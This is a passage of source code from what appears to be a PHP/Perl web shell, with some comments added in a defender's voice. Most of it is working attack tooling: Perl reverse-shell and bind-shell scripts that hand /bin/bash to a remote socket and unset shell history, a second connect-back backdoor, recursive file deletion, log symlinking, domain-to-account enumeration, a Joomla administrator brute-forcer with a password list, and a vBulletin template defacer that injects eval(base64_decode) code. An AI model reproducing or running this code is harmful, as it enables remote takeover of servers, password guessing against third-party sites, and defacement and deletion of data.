3857 <td><input name="s" class="submit" type="submit" name="submit" value="Connect"></td>
3858 </form>
3859 </tr>
3860 <tr>
3861 <td colspan=3><font color=#FFFFFF>[+] Client listen before connect back!
3862 <br>[+] Try check your Port with <a target="_blank" href="hxxp://www.canyouseeme.org/">hxxp://www.canyouseeme.org/</a>
3863 <br>[+] Client listen with command: <run>nc -vv -l -p <span id="ba">80</span></run></font></td>
3864
3865 </tr>
3866 </table>
3867
3868 <br><br>
3869 <table>
3870 <tr>
3871 <form method="POST" action="$ScriptLocation">
3872 <td>Bind Port: <input type="hidden" name="a" value="backbind"></td>
3873
3874 <td> Port: <input type="text" size="15" name="clientport" value="1412" onkeyup="document.getElementById('bi').innerHTML=this.value;">
3875
3876 Password: <input type="text" size="15" name="bindpass" value="THIEUGIABUON"></td>
3877 <td><input name="s" class="submit" type="submit" name="submit" value="Bind"></td>
3878 </form>
3879 </tr>
3880 <tr>
3881 <td colspan=3><font color=#FFFFFF>[+] Chuc nang chua dc test!
3882 <br>[+] Try command: <run>nc $ENV{'SERVER_ADDR'} <span id="bi">1412</span></run></font></td>
3883
3884 </tr>
3885 </table><br>
3886END
3887}
3888#------------------------------------------------------------------------------
3889# Backconnect use perl
3890#------------------------------------------------------------------------------
3891sub BackBind
3892{
 # Handles the "backbind" action. Two script texts are held in $backperl
 # and $bindperl: the first connects to a host and port given as arguments
 # and attaches the standard streams of a shell to that socket, the second
 # listens on a port and does the same for each accepted client. Depending
 # on the request fields, one of them is written to disk, a perl child is
 # started with system(), the file is unlinked and the CGI process exits.
 # Defender note: artefacts visible in this sub are the transient files
 # /tmp/backconnect.pl and /tmp/bindport.pl (or the same names in the
 # current directory), a perl child of the web server that owns a network
 # socket, and the string "unset HISTFILE" inside a command line. Mounting
 # /tmp noexec does not stop this, because the file is handed to the perl
 # interpreter rather than executed directly.
3893 use MIME::Base64;
3894 use Socket;
3895 $backperl="#!/usr/bin/perl
3896use IO::Socket;
3897$Shell = "/bin/bash";
3898$ARGC=@ARGV;
3899use Socket;
3900use FileHandle;
3901socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die print "[-] Unable to Resolve Host\n";
3902connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
3903print "Connected!";
3904SOCKET->autoflush();
3905open(STDIN, ">&SOCKET");
3906open(STDOUT,">&SOCKET");
3907open(STDERR,">&SOCKET");
3908print "--== Connected Backdoor ==-- \n\n";
3909system("unset HISTFILE; unset SAVEHIST ;echo '[+] Systeminfo: '; uname -a;echo;echo '[+] Userinfo: '; id;echo;echo '[+] Directory: '; pwd;echo; echo '[+] Shell: ';$Shell");
3910close SOCKET;";
3911 $bindperl="#!/usr/bin/perl
3912use Socket;
3913$ARGC=@ARGV;
3914$port = $ARGV[0];
3915$proto = getprotobyname('tcp');
3916$Shell = "/bin/bash";
3917socket(SERVER, PF_INET, SOCK_STREAM, $proto)or die "socket:$!";
3918setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1))or die "setsockopt: $!";
3919bind(SERVER, sockaddr_in($port, INADDR_ANY))or die "bind: $!";
3920listen(SERVER, SOMAXCONN) or die "listen: $!";
3921for(; $paddr = accept(CLIENT, SERVER); close CLIENT)
3922{
3923 open(STDIN, ">&CLIENT");
3924 open(STDOUT, ">&CLIENT");
3925 open(STDERR, ">&CLIENT");
3926 system("unset HISTFILE; unset SAVEHIST ;echo '[+] Systeminfo: '; uname -a;echo;echo '[+] Userinfo: '; id;echo;echo '[+] Directory: '; pwd;echo; echo '[+] Shell: ';$Shell");
3927 close(STDIN);
3928 close(STDOUT);
3929 close(STDERR);
3930}
3931";
3932
 # request fields select the mode: port 0 or missing shows the form, a
 # non-empty address selects the connect-back script, otherwise the listener
3933 $ClientAddr = $in{'clientaddr'};
3934 $ClientPort = int($in{'clientport'});
3935 if($ClientPort eq 0)
3936 {
3937 return &BackBindForm;
3938 }elsif(!$ClientAddr eq "")
3939 {
3940 $Data=decode_base64($backperl);
 # /tmp is preferred when writable, else the current directory
3941 if(-w "/tmp/")
3942 {
3943 $File="/tmp/backconnect.pl";
3944 }else
3945 {
3946 $File=$CurrentDir.$PathSep."backconnect.pl";
3947 }
3948 open(FILE, ">$File");
3949 print FILE $Data;
3950 close FILE;
3951 system("perl backconnect.pl $ClientAddr $ClientPort");
 # the dropped file is removed once system() returns
3952 unlink($File);
3953 exit 0;
3954 }else
3955 {
3956 $Data=decode_base64($bindperl);
3957 if(-w "/tmp")
3958 {
3959 $File="/tmp/bindport.pl";
3960 }else
3961 {
3962 $File=$CurrentDir.$PathSep."bindport.pl";
3963 }
3964 open(FILE, ">$File");
3965 print FILE $Data;
3966 close FILE;
3967 system("perl bindport.pl $ClientPort");
3968 unlink($File);
3969 exit 0;
3970 }
3971}
3972#------------------------------------------------------------------------------
3973# Array List Directory
3974#------------------------------------------------------------------------------
3975sub RmDir($)
3976{
 # Recursively deletes the directory given as the argument: plain entries
 # are unlinked, sub-directories are handled by a recursive call, and the
 # directory itself is removed last. No status is returned and a failed
 # rmdir is ignored (the final if body is empty).
 # Defender note: the dispatcher in this listing reaches this sub from the
 # "remove" request parameter of the "gui" action, so a single request can
 # delete a whole tree that the web-server account can write to.
3977 my $dir = shift;
3978 if(opendir(DIR,$dir))
3979 {
3980 while($file = readdir(DIR))
3981 {
3982 if(($file ne ".") && ($file ne ".."))
3983 {
3984 $file= $dir.$PathSep.$file;
3985 if(-d $file)
3986 {
3987 &RmDir($file);
3988 }
3989 else
3990 {
3991 unlink($file);
3992 }
3993 }
3994 }
3995 closedir(DIR);
3996 }
3997 if(!rmdir($dir))
3998 {
3999
4000 }
4001}
4002sub FileOwner($)
4003{
 # Returns "user/group" for an existing path on non-Windows hosts, built
 # from the uid and gid reported by stat(). Returns "???" on Windows or
 # when the path does not exist.
4004 my $file = shift;
4005 if(-e $file)
4006 {
 # stat fields 4 and 5 are the numeric owner and group ids
4007 ($uid,$gid) = (stat($file))[4,5];
4008 if($WinNT)
4009 {
4010 return "???";
4011 }
4012 else
4013 {
4014 $name=getpwuid($uid);
4015 $group=getgrgid($gid);
4016 return $name."/".$group;
4017 }
4018 }
4019 return "???";
4020}
4021sub ParentFolder($)
4022{
 # Returns the parent of $CurrentDir as reported by a shell: the command
 # changes into $CurrentDir, then "..", then runs $CmdPwd. The argument is
 # read but immediately overwritten by the shell output.
4023 my $path = shift;
4024 my $Comm = "cd \"$CurrentDir\"".$CmdSep."cd ..".$CmdSep.$CmdPwd;
 # chop removes the last character of the shell output
4025 chop($path = `$Comm`);
4026 return $path;
4027}
4028sub FilePerms($)
4029{
 # Returns a permission string for a path. On Windows this is "r / w" style
 # text built from the -r and -w file tests; elsewhere it is the four-digit
 # octal form of the mode bits. A missing path yields "0000".
4030 my $file = shift;
4031 my $ur = "-";
4032 my $uw = "-";
4033 if(-e $file)
4034 {
4035 if($WinNT)
4036 {
4037 if(-r $file){ $ur = "r"; }
4038 if(-w $file){ $uw = "w"; }
4039 return $ur . " / " . $uw;
4040 }else
4041 {
 # stat field 2 is the mode; the mask keeps permission and special bits
4042 $mode=(stat($file))[2];
4043 $result = sprintf("%04o", $mode & 07777);
4044 return $result;
4045 }
4046 }
4047 return "0000";
4048}
4049sub FileLastModified($)
4050{
 # Returns the modification time of an existing path formatted as
 # "DD/M/YYYY HH:MM" in local time (the month is not zero-padded), or "???"
 # when the path does not exist.
4051 my $file = shift;
4052 if(-e $file)
4053 {
 # stat field 9 is the modification time
4054 ($la) = (stat($file))[9];
4055 ($d,$m,$y,$h,$i) = (localtime($la))[3,4,5,2,1];
4056 $y = $y + 1900;
 # localtime months are 0-based; the table maps them to 1..12
4057 @month = qw/1 2 3 4 5 6 7 8 9 10 11 12/;
4058 $lmtime = sprintf("%02d/%s/%4d %02d:%02d",$d,$month[$m],$y,$h,$i);
4059 return $lmtime;
4060 }
4061 return "???";
4062}
4063sub FileSize($)
4064{
 # Returns the size in bytes of a plain file, or the string "0" for
 # anything that is not a plain file.
4065 my $file = shift;
4066 if(-f $file)
4067 {
4068 return -s $file;
4069 }
4070 return "0";
4071
4072}
4073sub ParseFileSize($)
4074{
 # Formats a byte count for display: values up to 1024 are shown as "N B",
 # values up to 1024*1024 as kilobytes and larger values as megabytes, both
 # with two decimal places.
4075 my $size = shift;
4076 if($size <= 1024)
4077 {
4078 return $size. " B";
4079 }
4080 else
4081 {
4082 if($size <= 1024*1024)
4083 {
4084 $size = sprintf("%.02f",$size / 1024);
4085 return $size." KB";
4086 }
4087 else
4088 {
4089 $size = sprintf("%.2f",$size / 1024 / 1024);
4090 return $size." MB";
4091 }
4092 }
4093}
4094sub trim($)
4095{
 # Returns the argument with leading and trailing whitespace removed.
4096 my $string = shift;
4097 $string =~ s/^\s+//;
4098 $string =~ s/\s+$//;
4099 return $string;
4100}
4101sub AddSlashes($)
4102{
 # Returns the argument with every backslash doubled. Quotes and other
 # characters are left as they are.
4103 my $string = shift;
4104 $string=~ s/\\/\\\\/g;
4105 return $string;
4106}
4107sub ListDir
4108{
 # Returns the HTML file-manager view of $CurrentDir: a path form followed
 # by a table with one row per directory and per file (name, size, owner,
 # permissions, modification time, action links). Directories are listed
 # first; both groups are sorted case-insensitively.
 # Defender note: the action links are plain GET requests, so their query
 # strings reach the access log. Patterns built in this sub are
 # "?a=gui&d=<path>", "?a=gui&d=<path>&remove=<name>",
 # "?a=command&d=<path>&c=edit%20<name>" and "?a=download&o=go&f=<path>".
4109 my $path = $CurrentDir.$PathSep;
 # collapse doubled backslashes left over from escaping
4110 $path=~ s/\\\\/\\/g;
4111 my $result = "<form name='f' action='$ScriptLocation'><span style='font: 11pt Verdana; font-weight: bold;'>Path: [ ".&AddLinkDir("gui")." ] </span><input type='text' name='d' size='40' value='$CurrentDir' /><input type='hidden' name='a' value='gui'><input class='submit' type='submit' value='Change'></form>";
4112 if(-d $path)
4113 {
4114 my @fname = ();
4115 my @dname = ();
4116 if(opendir(DIR,$path))
4117 {
 # split the entries into directories and everything else
4118 while($file = readdir(DIR))
4119 {
4120 $f=$path.$file;
4121 if(-d $f)
4122 {
4123 push(@dname,$file);
4124 }
4125 else
4126 {
4127 push(@fname,$file);
4128 }
4129 }
4130 closedir(DIR);
4131 }
4132 @fname = sort { lc($a) cmp lc($b) } @fname;
4133 @dname = sort { lc($a) cmp lc($b) } @dname;
4134 $result .= "<div><table width='90%' class='listdir'>
4135
4136 <tr style='background-color: #3e3e3e'><th>File Name</th>
4137 <th style='width:100px;'>File Size</th>
4138 <th style='width:150px;'>Owner</th>
4139 <th style='width:100px;'>Permission</th>
4140 <th style='width:150px;'>Last Modified</th>
4141 <th style='width:260px;'>Action</th></tr>";
 # $style alternates between two row classes; $i numbers the rows for the
 # client-side chmod and rename helpers
4142 my $style="line";
4143 my $i=0;
4144 foreach my $d (@dname)
4145 {
4146 $style= ($style eq "line") ? "notline": "line";
4147 $d = &trim($d);
4148 $dirname=$d;
 # ".." and "." are turned into real paths; other names get the prefix
4149 if($d eq "..")
4150 {
4151 $d = &ParentFolder($path);
4152 }
4153 elsif($d eq ".")
4154 {
4155 $d = $path;
4156 }
4157 else
4158 {
4159 $d = $path.$d;
4160 }
4161 $result .= "<tr class='$style'>
4162
4163 <td id='File_$i' style='font: 11pt Verdana; font-weight: bold;'><a href='?a=gui&d=".$d."'>[ ".$dirname." ]</a></td>";
4164 $result .= "<td>DIR</td>";
4165 $result .= "<td style='text-align:center;'>".&FileOwner($d)."</td>";
4166 $result .= "<td id='FilePerms_$i' style='text-align:center;' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($d)."','".$dirname."')\" ><span onclick=\"chmod_form(".$i.",'".$dirname."')\" >".&FilePerms($d)."</span></td>";
4167 $result .= "<td style='text-align:center;'>".&FileLastModified($d)."</td>";
4168 $result .= "<td style='text-align:center;'><a href='javascript:return false;' onclick=\"rename_form($i,'$dirname','".&AddSlashes(&AddSlashes($d))."')\">Rename</a> | <a onclick=\"if(!confirm('Remove dir: $dirname ?')) { return false;}\" href='?a=gui&d=$path&remove=$dirname'>Remove</a></td>";
4169 $result .= "</tr>";
4170 $i++;
4171 }
4172 foreach my $f (@fname)
4173 {
4174 $style= ($style eq "line") ? "notline": "line";
4175 $file=$f;
4176 $f = $path.$f;
4177 $view = "?dir=".$path."&view=".$f;
4178 $result .= "<tr class='$style'><td id='File_$i' style='font: 11pt Verdana;'><a href='?a=command&d=".$path."&c=edit%20".$file."'>".$file."</a></td>";
4179 $result .= "<td>".&ParseFileSize(&FileSize($f))."</td>";
4180 $result .= "<td style='text-align:center;'>".&FileOwner($f)."</td>";
4181 $result .= "<td id='FilePerms_$i' style='text-align:center;' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($f)."','".$file."')\" ><span onclick=\"chmod_form($i,'$file')\" >".&FilePerms($f)."</span></td>";
4182 $result .= "<td style='text-align:center;'>".&FileLastModified($f)."</td>";
4183 $result .= "<td style='text-align:center;'><a href='?a=command&d=".$path."&c=edit%20".$file."'>Edit</a> | <a href='javascript:return false;' onclick=\"rename_form($i,'$file','f')\">Rename</a> | <a href='?a=download&o=go&f=".$f."'>Download</a> | <a onclick=\"if(!confirm('Remove file: $file ?')) { return false;}\" href='?a=gui&d=$path&remove=$file'>Remove</a></td>";
4184 $result .= "</tr>";
4185 $i++;
4186 }
4187 $result .= "</table></div>";
4188 }
4189 return $result;
4190}
4191#------------------------------------------------------------------------------
4192# Try to View List User
4193#------------------------------------------------------------------------------
4194sub ViewDomainUser
4195{
 # Handles the "domainsuser" action. Reads /etc/named.conf, and for every
 # line that contains a zone declaration looks up the owner of a path under
 # /etc/valiases/ and adds a table row with the line and the owner name.
 # Returns an error paragraph when named.conf cannot be opened.
 # Defender note: this maps hosted domains to local accounts on a shared
 # host (the /etc/valiases layout is presumably that of a hosting control
 # panel; confirm for the system at hand). Keeping named.conf and the
 # valiases directory unreadable to the web-server account removes the
 # data source.
4196 open (domains, '/etc/named.conf') or $err=1;
4197 my @cnzs = <domains>;
4198 close d0mains;
4199 my $style="line";
4200 my $result="<h5><font style='font: 15pt Verdana;color: #ff9900;'>Hoang Sa - Truong Sa</font></h5>";
4201 if ($err)
4202 {
4203 $result .= ('<p>C0uldn\'t Bypass it , Sorry</p>');
4204 return $result;
4205 }else
4206 {
4207 $result .= '<table><tr><th>Domains</th> <th>User</th></tr>';
4208 }
4209 foreach my $one (@cnzs)
4210 {
4211 if($one =~ m/.*?zone "(.*?)" {/)
4212 {
4213 $style= ($style eq "line") ? "notline": "line";
 # stat field 4 is the numeric owner id, resolved to a name by getpwuid
4214 $filename= "/etc/valiases/".$one;
4215 $owner = getpwuid((stat($filename))[4]);
4216 $result .= '<tr class="$style" width=50%><td>'.$one.' </td><td> '.$owner.'</td></tr>';
4217 }
4218 }
4219 $result .= '</table>';
4220 return $result;
4221}
4222#------------------------------------------------------------------------------
4223# View Log
4224#------------------------------------------------------------------------------
4225sub ViewLog
4226{
 # Handles the "checklog" action on non-Windows hosts. For each of three
 # hard-coded web-server log paths it emits a small form that submits a
 # "less <path>" command to the "command" action, together with a status
 # cell. When a log is not writable, a shell is used to create a symbolic
 # link named error_log_<n> that points at it.
 # Defender note: symbolic links named error_log_0, error_log_1 or
 # error_log_2 in a web-accessible directory are a file-system artefact of
 # this sub. Log files readable only by root or the logging group, and a
 # web server configured not to follow symbolic links it does not own,
 # limit what the links can expose.
4227 if($WinNT)
4228 {
4229 return "<h2><font style='font: 20pt Verdana;color: #ff9900;'>Don't run on Windows</font></h2>";
4230 }
4231 my $result="<table><tr><th>Path Log</th><th>Submit</th></tr>";
4232 my @pathlog=(
4233 '/usr/local/apache/logs/error_log',
4234 '/var/log/hxxpd/error_log',
4235 '/usr/local/apache/logs/access_log'
4236 );
4237 my $i=0;
4238 my $perms;
4239 my $sl;
4240 foreach my $log (@pathlog)
4241 {
4242 if(-w $log)
4243 {
4244 $perms="OK";
4245 }else
4246 {
 # the link is created in the working directory of the CGI process
4247 chop($sl = `ln -s $log error_log_$i`);
4248 if(&trim($ls) eq "")
4249 {
4250 if(-r $ls)
4251 {
4252 $perms="OK";
4253 $log="error_log_".$i;
4254 }
4255 }else
4256 {
4257 $perms="<font style='color: red;'>Cancel<font>";
4258 }
4259 }
4260 $result .=<<END;
4261 <tr>
4262
4263 <form action="" method="post">
4264 <td><input type="text" onkeyup="document.getElementById('log_$i').value='less ' + this.value;" value="$log" size='50'/></td>
4265 <td><input class="submit" type="submit" value="Try" /></td>
4266 <input type="hidden" id="log_$i" name="c" value="less $log"/>
4267 <input type="hidden" name="a" value="command" />
4268 <input type="hidden" name="d" value="$CurrentDir" />
4269 </form>
4270 <td>$perms</td>
4271
4272 </tr>
4273END
4274 $i++;
4275 }
4276 $result .="</table>";
4277 return $result;
4278}
4279#------------------------------------------------------------------------------
4280# Main Program - Execution Starts Here
4281#------------------------------------------------------------------------------
# Request dispatcher. ReadParse and GetCookies are defined outside this
# excerpt; judging by their use below they fill %in and %Cookies.
# Request parameters read here: p (password), c (command), f (file name),
# o (options), a (action), d (directory), plus chmod, rename, remove, data
# and file for the file-manager and editor actions.
# Action values handled: login, gui, command, save, upload, backbind,
# bruteforcer, download, checklog, domainsuser, logout.
# Defender note: these short parameter names and action values, together
# with the SAVEDPWD cookie used below, form a request fingerprint for web
# logs and WAF rules.
4282&ReadParse;
4283&GetCookies;
4284
4285$ScriptLocation = $ENV{'SCRIPT_NAME'};
4286$ServerName = $ENV{'SERVER_NAME'};
4287$LoginPassword = $in{'p'};
4288$RunCommand = $in{'c'};
4289$TransferFile = $in{'f'};
4290$Options = $in{'o'};
4291$Action = $in{'a'};
4292
4293$Action = "command" if($Action eq ""); # no action specified, use default
4294
4295# get the directory in which the commands will be executed
4296$CurrentDir = &trim($in{'d'});
4297# default to a directory listing when no command was supplied
4298$RunCommand= $WinNT?"dir":"dir -lia" if($RunCommand eq "");
4299chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
4300
# the session check compares the SAVEDPWD cookie value directly with
# $Password, so the cookie carries the password itself on every request
4301$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
4302
4303if($Action eq "login" || !$LoggedIn) # user needs/has to login
4304{
4305 &PerformLogin;
4306}elsif($Action eq "gui") # GUI directory
4307{
4308 &PrintPageHeader;
4309 if(!$WinNT)
4310 {
 # a non-zero numeric "chmod" value is passed to the chmod program
 # through a shell, applied to $TransferFile inside $CurrentDir
4311 $chmod=int($in{'chmod'});
4312 if(!($chmod eq 0))
4313 {
4314 $chmod=int($in{'chmod'});
4315 $file=$CurrentDir.$PathSep.$TransferFile;
4316 chop($result= `chmod $chmod "$file"`);
4317 if(&trim($result) eq "")
4318 {
4319 print "<run> Done! </run><br>";
4320 }else
4321 {
4322 print "<run> Sorry! You dont have permissions! </run><br>";
4323 }
4324 }
4325 }
4326 $rename=$in{'rename'};
4327 if(!$rename eq "")
4328 {
4329 if(rename($TransferFile,$rename))
4330 {
4331 print "<run> Done! </run><br>";
4332 }else
4333 {
4334 print "<run> Sorry! You dont have permissions! </run><br>";
4335 }
4336 }
4337 $remove=$in{'remove'};
4338 if($remove ne "")
4339 {
 # directories go to the recursive RmDir, anything else is unlinked
4340 $rm = $CurrentDir.$PathSep.$remove;
4341 if(-d $rm)
4342 {
4343 &RmDir($rm);
4344 }else
4345 {
4346 if(unlink($rm))
4347 {
4348 print "<run> Done! </run><br>";
4349 }else
4350 {
4351 print "<run> Sorry! You dont have permissions! </run><br>";
4352 }
4353 }
4354 }
4355 print &ListDir;
4356
4357}
4358elsif($Action eq "command") # user wants to run a command
4359{
4360 &PrintPageHeader("c");
4361 print &ExecuteCommand;
4362}
4363elsif($Action eq "save") # user wants to save a file
4364{
4365 &PrintPageHeader;
4366 if(&SaveFile($in{'data'},$in{'file'}))
4367 {
4368 print "<run> Done! </run><br>";
4369 }else
4370 {
4371 print "<run> Sorry! You dont have permissions! </run><br>";
4372 }
4373 print &ListDir;
4374}
4375elsif($Action eq "upload") # user wants to upload a file
4376{
4377 &PrintPageHeader;
4378
4379 print &UploadFile;
4380}
4381elsif($Action eq "backbind") # user wants to back connect or bind port
4382{
4383 &PrintPageHeader("clientport");
4384 print &BackBind;
4385}
4386elsif($Action eq "bruteforcer") # user wants to brute force
4387{
4388 &PrintPageHeader;
4389 print &BruteForcer;
4390}elsif($Action eq "download") # user wants to download a file
4391{
 # no page header is printed first, since the reply may be a raw file
4392 print &DownloadFile;
4393}elsif($Action eq "checklog") # user wants to view log file
4394{
4395 &PrintPageHeader;
4396 print &ViewLog;
4397
4398}elsif($Action eq "domainsuser") # user wants to view list user/domain
4399{
4400 &PrintPageHeader;
4401 print &ViewDomainUser;
4402}elsif($Action eq "logout") # user wants to logout
4403{
4404 &PerformLogout;
4405}
4406&PrintPageFooter;
4407'; $file = fopen("izo.cin" ,"w+"); $write = fwrite ($file ,base64_decode($cgishellizocin)); fclose($file); chmod("izo.cin",0755); $netcatshell = '#!/usr/bin/perl
4408 use Socket;
4409 print "Data Cha0s Connect Back Backdoor\n\n";
4410 if (!$ARGV[0]) {
4411 printf "Usage: $0 [Host] <Port>\n";
4412 exit(1);
4413 }
4414 print "[*] Dumping Arguments\n";
4415 $host = $ARGV[0];
4416 $port = 80;
4417 if ($ARGV[1]) {
4418 $port = $ARGV[1];
4419 }
4420 print "[*] Connecting...\n";
4421 $proto = getprotobyname('tcp') || die("Unknown Protocol\n");
4422 socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
4423 my $target = inet_aton($host);
4424 if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
4425 die("Unable to Connect\n");
4426 }
4427 print "[*] Spawning Shell\n";
4428 if (!fork( )) {
4429 open(STDIN,">&SERVER");
4430 open(STDOUT,">&SERVER");
4431 open(STDERR,">&SERVER");
4432 exec {'/bin/sh'} '-bash' . "\0" x 4;
4433 exit(0);
4434 }
4435 print "[*] Datached\n\n";'; $file = fopen("dc.pl" ,"w+"); $write = fwrite ($file ,base64_decode($netcatshell)); fclose($file); chmod("dc.pl",0755); echo "<iframe src=cgitelnet1/izo.cin width=96% height=90% frameborder=0></iframe>
4436
4437
4438 </div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'jbrute')) { ?>
4439<form action="?y=<?php echo $pwd; ?>&x=jbrute" method="post">
4440
4441 <meta name="author" content="RetnOHacK" />
4442 <meta name="keywords" content="Joomla, Bruter, JoomlaBruter, JoomlaBruterForce, JoomlaBruterForceOnline" />
4443 <meta name="description" content="RetnOHacK #Procoder'z Team Albanian" />
4444<center>
4445</br></br>
4446<center><b><font color="lime">--==[ Joomla Bruter Force ]==--</font></b><br /><br />
4447<form method="post" action="" enctype="multipart/form-data">
4448<table class="tabnet" width="38%" border="0"><center>
4449<th colspan="2">Joomla Brute Force</th>
4450<tr><td><p ><font class="d1">User :</font></th>
4451<input class="inputz" type='text' name="usr" value="admin" size="15"> </font></center><br /><br /></p>
4452</td></tr>
4453<tr><td><font class="">Sites list :</font>
4454</td><td><font class="" >Pass list :</font></td></tr>
4455<tr>
4456 <td>
4457<textarea name="sites" style="background:black;" cols="40" rows="13" ></textarea>
4458</td><td>
4459<textarea name="w0rds" style="background:black;" cols="40" rows="13" >
4460admin
4461Adm
4462Administrator
4463administrador
4464adm2014adm2012
4465123456
4466password
4467102030
4468123123
446912345
4470123456789
4471pass
4472test
4473admin123
4474demo
4475!@#$%^
4476</textarea>
4477</td></tr><center><tr><td>
4478<font >
4479<input class="inputzbut" type="submit" name="x" value="start" id="d4">
4480</font></td></tr><br>
4481Thanks to procoder, Team Albanian<br></center></table>
4482</form></center>
4483<?php /* Reviewer note: handler for the "jbrute" form above. Every submitted
 password is tried against every submitted site with the user name from
 field "usr"; txt_cln() only strips CR and LF from each entry.
 Defender note: artefacts visible in this code are the files Result.txt
 (hits are appended to it) and cookie.txt (curl cookie jar), both opened
 with relative paths, and outbound POSTs to <site>/administrator/index.php
 carrying option=com_login&task=login with the fixed Firefox/3.0.4
 user-agent string set below. On the receiving side, throttling and
 multi-factor authentication on the administrator login limit what
 repeated guesses can achieve. */ @set_time_limit(0); if($_POST['x']){ echo "<hr>"; $sites = explode("\n",$_POST["sites"]); $w0rds = explode("\n",$_POST["w0rds"]); $Attack = new Joomla_brute_Force(); foreach($w0rds as $pwd){ foreach($sites as $site){ $Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); flush();flush(); } } } function txt_cln($value){ return str_replace(array("\n","\r"),"",$value); } /* check_it() treats a response containing "com_config" as a successful login; post() fetches the hidden 32-hex-digit form token through extract_token()/get_source() before submitting. */ class Joomla_brute_Force{ public function check_it($site,$user,$pass){ if(eregi('com_config',$this->post($site,$user,$pass))){ echo "<span class=\"x2\"><b># Success : $user:$pass -> <a href='$site/administrator/index.php'>$site/administrator/index.php</a></b></span><BR>"; $f = fopen("Result.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/administrator/index.php\n"); fclose($f); flush(); }else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();} } public function post($site,$user,$pass){ $token = $this->extract_token($site); $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php"); @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt'); @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4'); @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl,CURLOPT_POST,1); curl_setopt($curl,CURLOPT_POSTFIELDS,'username='.$user.'&passwd='.$pass.'&lang=en-GB&option=com_login&task=login&'.$token.'=1'); curl_setopt($curl,CURLOPT_TIMEOUT,20); $exec=curl_exec($curl); curl_close($curl); return $exec; } public function extract_token($site){ $source = $this->get_source($site); preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token); return $token[1][0]; } public function get_source($site){ $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php"); 
@curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt'); @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4'); @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl,CURLOPT_TIMEOUT,20); $exec=curl_exec($curl); curl_close($curl); return $exec; } } } elseif(isset($_GET['x']) && ($_GET['x'] == 'vb')) { ?>
4484 <form action="?y=<?php echo $pwd; ?>&x=vb" method="post">
4485 <br><br><br><div align="center">
4486 <H2><span style="font-weight: 400"><font face="Trebuchet MS" size="4">
4487 <b><font color="#FF0000">--==[ VB Index Changer ]==--</font></b>
4488 </div><br>
4489 <?php
// "VB Index Changer" branch (?x=vb). With no POST field 'index' it only renders the
// form below; otherwise it connects to a database with operator-supplied credentials
// and overwrites the `template` table.
if(empty($_POST['index'])){ echo "<center><FORM method=\"POST\">"; echo "<table class=\"tabnet\">
4490<th colspan=\"2\">Vb Index Changer</th>
4491<tr><td>host </td><td><input class=\"inputz\" type=\"text\" size=\"60\" name=\"localhost\" value=\"localhost\"></td></tr>
4492<tr><td>database </td><td><input class=\"inputz\" type=\"text\" size=\"60\" name=\"database\" value=\"forum_vb\"></td></tr>
4493<tr><td>username </td><td><input class=\"inputz\" type=\"text\" size=\"60\" name=\"username\" value=\"user_vb\"></td></tr>
4494<tr><td>password </td><td><input class=\"inputz\" type=\"text\" size=\"60\" name=\"password\" value=\"vb\"></td></tr>
4495</tr>
4496<th colspan=\"2\">Your Index Code</th></table><table class=\"tabnet\">
4497<TEXTAREA name=\"index\" rows=\"13\" style=\"background:black\" border=\"1\" cols=\"69\" name=\"code\">your index code</TEXTAREA><br>
4498<INPUT class=\"inputzbut\" type=\"submit\" value=\"setting\" name=\"send\">
4499</FORM></table></center>"; }else{
// Host, database name and credentials all come from the POST body. The legacy
// mysql_* API is used, and die(mysql_error()) prints database errors into the page.
$localhost = $_POST['localhost']; $database = $_POST['database']; $username = $_POST['username']; $password = $_POST['password']; $index = $_POST['index']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error());
// The stored value wraps the posted markup in eval(base64_decode(...)) followed by
// exit(); presumably it relies on the forum evaluating template text as PHP, which
// is not shown here. Detection: rows in `template` that contain "eval(base64_decode("
// or "{${exit()}}".
$index=str_replace("\'","'",$index); $set_index = "{\${eval(base64_decode(\'"; $set_index .= base64_encode("echo \"$index\";"); $set_index .= "\'))}}{\${exit()}}</textarea>";
// The UPDATE has no WHERE clause, so every row of `template` receives the same value;
// recovery means restoring the table, not repairing one row. The statement is also
// echoed to the page and is built by string concatenation.
echo("UPDATE template SET template ='".$set_index."' ") ; $ok=@mysql_query("UPDATE template SET template ='".$set_index."'") or die(mysql_error()); if($ok){ echo "!! update finish !!<br><br>"; } } } elseif(isset($_GET['x']) && ($_GET['x'] == 'bypass')) { ?>
4500<form action="?y=<?php echo $pwd; ?>&x=bypass" method="post">
4501
4502<?php
// "Command Bypass" branch (?x=bypass): prints two forms, then passes POST fields
// straight to shell_exec(). Nothing in this branch authenticates the caller; any
// gate would have to sit earlier in the file, outside this excerpt.
